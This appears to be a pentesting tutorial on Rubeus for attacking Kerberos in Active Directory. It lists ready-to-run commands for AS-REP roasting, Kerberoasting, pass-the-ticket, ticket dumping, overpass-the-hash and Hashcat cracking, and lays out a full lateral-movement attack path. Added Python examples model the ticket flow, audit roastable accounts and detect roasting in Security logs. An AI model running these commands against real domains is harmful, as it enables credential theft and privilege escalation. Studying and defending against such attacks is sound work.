Rubeus for Pentesters
Introduction
Kerberos is a cornerstone of authentication in modern Windows environments, especially within Active Directory domains. But it’s also full of opportunities for abuse — if you know where to look.
Rubeus is one of the most powerful tools for post-exploitation Kerberos abuse. Written in C#, it allows attackers and red teamers to interact with and manipulate Kerberos tickets, extract credentials, perform various attacks like AS-REP roasting and Kerberoasting, and even inject forged tickets into memory for lateral movement or privilege escalation.
This guide will walk you through exactly what Rubeus does, when to use it, and how it fits into real-world attack paths.
What is Kerberos?
Kerberos is an authentication protocol based on tickets. In AD environments, it enables users and services to prove their identities securely.
At a high level:
- The user authenticates to the Key Distribution Center (KDC) and receives a Ticket Granting Ticket (TGT).
- The TGT is used to request Service Tickets (TGS) to access specific services.
- These tickets are encrypted with secret keys and passed between clients and services.
Kerberos is efficient and secure when configured properly, but several features can be exploited under the right conditions — and that’s where Rubeus comes in.
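To make the ticket flow above concrete, here is a toy model of the AS and TGS exchanges. It is an added teaching example, not Rubeus code and not real Kerberos cryptography: "encryption" is a symbolic seal that opens only with the key it was made with, the KDC and principals are plain Python objects, and the names alice, svc_backup and svc_sql are constructed. It shows which key protects each piece of material, and therefore where the two roasting conditions discussed later come from: without pre-authentication the KDC hands out material sealed under the user's long-term key to anyone who asks, and a service ticket is always sealed under the service account's key, so its strength is exactly the strength of that account's password.

```python
"""Toy model of the Kerberos ticket flow described above (AS and TGS exchanges).

Added teaching example, not Rubeus code and not real Kerberos cryptography:
"encryption" is a symbolic seal that opens only with the key it was made with,
the KDC and principals are plain Python objects, and every name is constructed.
"""
from dataclasses import dataclass, field
import secrets
import time


@dataclass(frozen=True)
class Key:
    owner: str                      # principal this long-term or session key belongs to
    material: bytes = field(default_factory=lambda: secrets.token_bytes(16))


@dataclass(frozen=True)
class Sealed:
    """Stand-in for Kerberos EncryptedData: opens only with the sealing key."""
    key: Key
    payload: dict

    def open(self, key: Key) -> dict:
        if key != self.key:
            raise ValueError("integrity check failed: wrong key")
        return dict(self.payload)


class PreauthRequired(Exception):
    """Models the KRB-ERROR KDC_ERR_PREAUTH_REQUIRED."""


class KDC:
    def __init__(self):
        self.krbtgt = Key("krbtgt")            # seals every TGT
        self.keys = {}                          # principal -> long-term key (password-derived in AD)
        self.require_preauth = {}

    def register(self, name, require_preauth=True):
        self.keys[name] = Key(name)
        self.require_preauth[name] = require_preauth
        return self.keys[name]

    def as_exchange(self, client, pa_enc_timestamp=None):
        """AS-REQ -> AS-REP: returns (enc_part sealed under the user's key, TGT)."""
        user_key = self.keys[client]
        if self.require_preauth[client]:
            # With pre-auth enforced the client must first prove it holds the key.
            if pa_enc_timestamp is None:
                raise PreauthRequired(client)
            ts = pa_enc_timestamp.open(user_key)["timestamp"]  # wrong key -> ValueError
            if abs(time.time() - ts) > 300:
                raise ValueError("KDC_ERR_PREAUTH_FAILED: clock skew")
        session = Key(f"session:{client}")
        # Without pre-auth this enc_part is handed out on request; its only
        # protection is the strength of the user's password.
        enc_part = Sealed(user_key, {"session_key": session})
        tgt = Sealed(self.krbtgt, {"client": client, "session_key": session})
        return enc_part, tgt

    def tgs_exchange(self, tgt, authenticator, service):
        """TGS-REQ -> TGS-REP: the service ticket is sealed under the *service's* key."""
        body = tgt.open(self.krbtgt)
        authenticator.open(body["session_key"])       # caller proves it holds the TGT session key
        svc_session = Key(f"session:{body['client']}->{service}")
        service_ticket = Sealed(self.keys[service],
                                {"client": body["client"], "session_key": svc_session})
        enc_part = Sealed(body["session_key"], {"session_key": svc_session})
        return service_ticket, enc_part


def client_login(kdc, name, user_key):
    """Client side of a pre-authenticated AS exchange; returns (session_key, tgt)."""
    pa = Sealed(user_key, {"timestamp": time.time()})
    enc_part, tgt = kdc.as_exchange(name, pa)
    return enc_part.open(user_key)["session_key"], tgt


def demo():
    """Walk the flow once and report which key protects each piece of material."""
    kdc = KDC()
    alice_key = kdc.register("alice")                               # pre-auth enforced (default)
    kdc.register("svc_backup", require_preauth=False)              # the AS-REP roasting condition
    sql_key = kdc.register("svc_sql")                               # owns MSSQLSvc/sql.corp.local
    out = {}
    try:
        kdc.as_exchange("alice")                                    # AS-REQ with no PA data
    except PreauthRequired:
        out["alice_no_preauth"] = "KDC_ERR_PREAUTH_REQUIRED"
    enc_part, _ = kdc.as_exchange("svc_backup")                     # no proof of password needed
    out["svc_backup_enc_part_key"] = enc_part.key.owner
    session, tgt = client_login(kdc, "alice", alice_key)
    ticket, _ = kdc.tgs_exchange(tgt, Sealed(session, {"timestamp": time.time()}), "svc_sql")
    out["service_ticket_key"] = ticket.key.owner                    # any domain user can obtain this
    out["service_sees_client"] = ticket.open(sql_key)["client"]     # only svc_sql can open it
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Running `demo()` shows the two facts that matter for the rest of the article: the pre-auth-enforced account yields nothing until the client proves key knowledge, while the account without pre-auth yields an enc_part sealed under its own key on request, and the service ticket for svc_sql is sealed under svc_sql's key even though it was requested by alice. The corresponding mitigations follow directly: leave pre-authentication enforced on every account, and give service accounts passwords that cannot be guessed offline (long random passwords or group managed service accounts).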
Why Rubeus Matters in Pentesting
Rubeus is a post-exploitation Swiss Army knife for interacting with Kerberos. Whether you’ve landed on a machine and want to extract tickets or you’re looking to move laterally, escalate privileges, or maintain access — Rubeus can help.
It can be used to:
- Harvest and crack AS-REP or Kerberoastable hashes
- Request and inject TGTs or TGS tickets
- Perform Pass-the-Ticket attacks
- Forge Golden/Silver tickets
- Monitor ticket requests in real time
Rubeus operates in-memory and can be obfuscated, making it a common tool in stealthier red team operations.
How to Use Rubeus – Commands and Examples
You typically run Rubeus from an elevated or domain-joined context. Here’s a breakdown of its key functionality.
1. AS-REP Roasting
Targets accounts that do not require Kerberos pre-authentication.
Rubeus.exe asreproast /user:johnny /outfile:hash.txt /format:hashcat
# Requests the AS-REP for a user with pre-auth disabled and writes the crackable hash to hash.txt
With /format:hashcat the output is in Hashcat format and can be cracked offline:
hashcat -m 18200 hash.txt rockyou.txt --force
2. Kerberoasting
Targets service accounts with SPNs registered in AD.
Rubeus.exe kerberoast
# Requests TGS tickets for accounts with SPNs and dumps crackable hashes
You can specify specific users or filters:
Rubeus.exe kerberoast /user:svc_sql /domain:corp.local
Crack with Hashcat using mode 13100.
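The two sections above describe exposure conditions that a defender can enumerate directly from the directory before anyone roasts anything. The following audit helper is an added example, not part of Rubeus: it works on plain dicts shaped like LDAP query results (userAccountControl, servicePrincipalName, msDS-SupportedEncryptionTypes) so that it runs offline on the constructed records below; in practice you would feed it the results of an LDAP search against the domain. The svc_backup, svc_sql and corp.local names reuse the article's examples; the other accounts are made up.

```python
"""Audit helper: flag accounts that meet the AS-REP roasting or Kerberoasting
conditions described above.

Added example, not Rubeus code. Records are dicts shaped like LDAP results;
the SAMPLE list is constructed and the names mirror the article's examples.
"""

# userAccountControl bits (MS-ADTS, section on userAccountControl)
UF_ACCOUNTDISABLE = 0x0002
UF_NORMAL_ACCOUNT = 0x0200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_DONT_EXPIRE_PASSWD = 0x10000
UF_DONT_REQUIRE_PREAUTH = 0x400000

# msDS-SupportedEncryptionTypes bits
ENC_RC4_HMAC = 0x04
ENC_AES128 = 0x08
ENC_AES256 = 0x10


def is_enabled(rec):
    return not (rec.get("userAccountControl", 0) & UF_ACCOUNTDISABLE)


def preauth_disabled(rec):
    return bool(rec.get("userAccountControl", 0) & UF_DONT_REQUIRE_PREAUTH)


def rc4_tickets_possible(rec):
    """True when the KDC may issue RC4 service tickets for this account.
    Assumption: an unset or zero attribute is treated as RC4-capable, which is
    the legacy default for accounts that never had the attribute set."""
    etypes = rec.get("msDS-SupportedEncryptionTypes", 0)
    return etypes == 0 or bool(etypes & ENC_RC4_HMAC)


def audit(records):
    """Return (account, finding) pairs for enabled accounts only."""
    findings = []
    for rec in records:
        name = rec["sAMAccountName"]
        if not is_enabled(rec):
            continue                                    # disabled accounts cannot be roasted
        if preauth_disabled(rec):
            findings.append((name, "AS-REP roastable: Kerberos pre-authentication not required"))
        spns = rec.get("servicePrincipalName", [])
        # Computer accounts ($) have long random passwords and krbtgt is handled
        # separately, so neither is a meaningful Kerberoasting target.
        if spns and not name.endswith("$") and name.lower() != "krbtgt":
            if rc4_tickets_possible(rec):
                findings.append((name, "Kerberoastable with RC4 tickets: SPN set and RC4 allowed"))
            else:
                findings.append((name, "SPN set, AES-only tickets: still needs a strong password"))
    return findings


# Constructed records; only the shape matches real LDAP output.
SAMPLE = [
    {"sAMAccountName": "svc_backup",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_EXPIRE_PASSWD | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "svc_sql", "userAccountControl": UF_NORMAL_ACCOUNT,
     "servicePrincipalName": ["MSSQLSvc/sql.corp.local:1433"],
     "msDS-SupportedEncryptionTypes": 0},
    {"sAMAccountName": "svc_web", "userAccountControl": UF_NORMAL_ACCOUNT,
     "servicePrincipalName": ["HTTP/web.corp.local"],
     "msDS-SupportedEncryptionTypes": ENC_AES128 | ENC_AES256},
    {"sAMAccountName": "old_admin",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "WS01$", "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT,
     "servicePrincipalName": ["HOST/ws01.corp.local"]},
    {"sAMAccountName": "krbtgt", "userAccountControl": UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE,
     "servicePrincipalName": ["kadmin/changepw"]},
]


if __name__ == "__main__":
    for account, finding in audit(SAMPLE):
        print(f"{account}: {finding}")
```

The fixes follow from the findings: clear the "Do not require Kerberos preauthentication" flag on svc_backup, and for svc_sql either set msDS-SupportedEncryptionTypes to AES only after confirming the service supports it or, better, move the SPN to a group managed service account so the password is long, random and rotated automatically.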
3. Requesting a TGT with Credentials
Rubeus.exe asktgt /user:alice /password:Password123 /domain:corp.local
# Requests a TGT with the supplied credentials and prints it as a base64-encoded .kirbi blob
Or write it to a .kirbi file:
Rubeus.exe asktgt /user:alice /password:Password123 /domain:corp.local /outfile:alice_tgt.kirbi
4. Pass-the-Ticket (PTT)
Inject a valid ticket into the current session.
Rubeus.exe ptt /ticket:ticket.kirbi
# Injects the ticket into memory
Useful for lateral movement when reusing a stolen ticket.
5. Dump Tickets from Memory
Rubeus.exe dump
# Dumps all Kerberos tickets from memory
You can save these to disk for reuse or analysis.
6. Renew a TGT
If you have a valid TGT, you can renew it before it expires.
Rubeus.exe renew /ticket:ticket.kirbi
# Renews the TGT using the session key
This helps maintain persistence without re-authenticating.
7. Overpass-the-Hash (Pass-the-Key)
You can request a TGT using just an NTLM hash.
Rubeus.exe asktgt /user:svc_account /rc4:<NTLM_HASH> /domain:corp.local
# Requests a TGT using a hash instead of a password
This is especially useful in hash dumping or NTLM relay scenarios.
8. Monitor Kerberos Activity in Real Time
Rubeus.exe monitor
# Captures and displays real-time Kerberos ticket activity
Great for watching how users and services authenticate — useful for identifying SPNs and targets of interest.
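The defender's counterpart to watching ticket activity is the domain controller's Security log: event 4768 records every TGT request and 4769 every service ticket request, with the fields needed to spot the two roasting patterns from sections 1 and 2. The detection logic below is an added example, not part of Rubeus; the event records are plain dicts using the field names the Windows events carry, the sample events are constructed, and the account and service names reuse the article's (svc_backup, MSSQLSvc/sql.corp.local) with a few made-up SPNs added to form a burst.

```python
"""Detection logic over Security log events 4768 (TGT requested) and 4769
(service ticket requested) for the AS-REP roasting and Kerberoasting patterns.

Added example, not Rubeus code. Events are dicts using the Windows field
names; SAMPLE_EVENTS is constructed, with names taken from the article.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17           # TicketEncryptionType for RC4-HMAC (etype 23)
PREAUTH_NONE = 0          # PreAuthType 0: no pre-auth (interactive logons use 2, PKINIT 15)
BURST_WINDOW = timedelta(minutes=5)
BURST_THRESHOLD = 5       # distinct SPNs requested by one account inside the window


def detect_asrep_roasting(events):
    """Successful 4768 with PreAuthType 0: the KDC issued an AS-REP encrypted
    under the account's key without any proof of the password. Failed requests
    (non-zero Status) are excluded; they leak nothing crackable."""
    return [
        (e["TimeCreated"], e["TargetUserName"], e["IpAddress"])
        for e in events
        if e["EventID"] == 4768
        and int(e["PreAuthType"]) == PREAUTH_NONE
        and e["Status"] == "0x0"
    ]


def detect_kerberoasting(events):
    """4769 bursts: one account requesting many distinct SPNs in a short window.
    RC4 (0x17) requests in a domain whose service accounts support AES are an
    extra indicator, so the count is reported alongside the burst."""
    by_account = defaultdict(list)
    for e in events:
        if e["EventID"] == 4769 and e["Status"] == "0x0":
            by_account[e["TargetUserName"]].append(e)
    alerts = []
    for account, evs in by_account.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        for i, first in enumerate(evs):
            window = [e for e in evs[i:]
                      if e["TimeCreated"] - first["TimeCreated"] <= BURST_WINDOW]
            spns = {e["ServiceName"] for e in window}
            if len(spns) >= BURST_THRESHOLD:
                rc4 = sum(1 for e in window
                          if int(e["TicketEncryptionType"], 16) == RC4_HMAC)
                alerts.append({"account": account, "start": first["TimeCreated"],
                               "ip": first["IpAddress"], "distinct_spns": len(spns),
                               "rc4_requests": rc4})
                break                                   # one alert per account per burst
    return alerts


# Constructed sample events (timestamp and addresses are made up).
T0 = datetime(2024, 1, 15, 9, 0, 0)


def ev(event_id, offset_s, **fields):
    base = {"EventID": event_id, "TimeCreated": T0 + timedelta(seconds=offset_s),
            "Status": "0x0", "IpAddress": "10.0.0.25"}
    base.update(fields)
    return base


BURST_SPNS = ["MSSQLSvc/sql.corp.local:1433", "HTTP/web.corp.local", "CIFS/fs01.corp.local",
              "MSSQLSvc/sql02.corp.local:1433", "HTTP/intranet.corp.local",
              "exchangeMDB/mail.corp.local"]

SAMPLE_EVENTS = [
    ev(4768, 0, TargetUserName="alice", PreAuthType="2", IpAddress="10.0.0.7"),   # normal logon
    ev(4768, 5, TargetUserName="bob", PreAuthType="0", Status="0x19"),             # pre-auth required reply
    ev(4768, 30, TargetUserName="svc_backup", PreAuthType="0"),                     # AS-REP without pre-auth
    ev(4769, 40, TargetUserName="alice@CORP.LOCAL", ServiceName="CIFS/fs01.corp.local",
       TicketEncryptionType="0x12", IpAddress="10.0.0.7"),                          # ordinary AES ticket
] + [
    ev(4769, 60 + 5 * i, TargetUserName="svc_backup@CORP.LOCAL",
       ServiceName=spn, TicketEncryptionType="0x17")
    for i, spn in enumerate(BURST_SPNS)
]


if __name__ == "__main__":
    print("AS-REP roasting:", detect_asrep_roasting(SAMPLE_EVENTS))
    print("Kerberoasting:", detect_kerberoasting(SAMPLE_EVENTS))
```

Both checks need the "Audit Kerberos Authentication Service" and "Audit Kerberos Service Ticket Operations" subcategories enabled on the domain controllers; without them neither event is written. The burst threshold is a starting point to tune against your own baseline, since monitoring or inventory tools can legitimately request many service tickets.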
Example Attack Path Using Rubeus
Here’s how you might use Rubeus in a real-world Active Directory attack:
- Initial Access: You gain access as a low-privileged domain user.
- AS-REP Roasting: Use asreproast to dump and crack a hash for svc_backup.
- Login with Password: The cracked password is reused by svc_backup on other machines.
- Kerberoasting: svc_backup has rights to request a TGS for MSSQLSvc/sql.corp.local. You dump it.
- Crack the TGS hash: You get the service account password, and it has local admin rights on a SQL server.
- Dump Tickets: From the SQL server, you dump tickets using Rubeus dump.
- Reuse TGT: Inject the TGT on your own foothold with ptt.
- Lateral Movement: Use the ticket to access another server or dump more hashes.
Rubeus gives you control at every step.
Final Thoughts
Rubeus is an essential tool in any pentester or red teamer’s post-exploitation toolkit. It exposes the depth and nuance of Kerberos, turning what often seems like an opaque protocol into something practical and exploitable.
Once you understand how Kerberos really works, Rubeus becomes more than just a tool — it becomes a roadmap for lateral movement and privilege escalation in Active Directory environments.
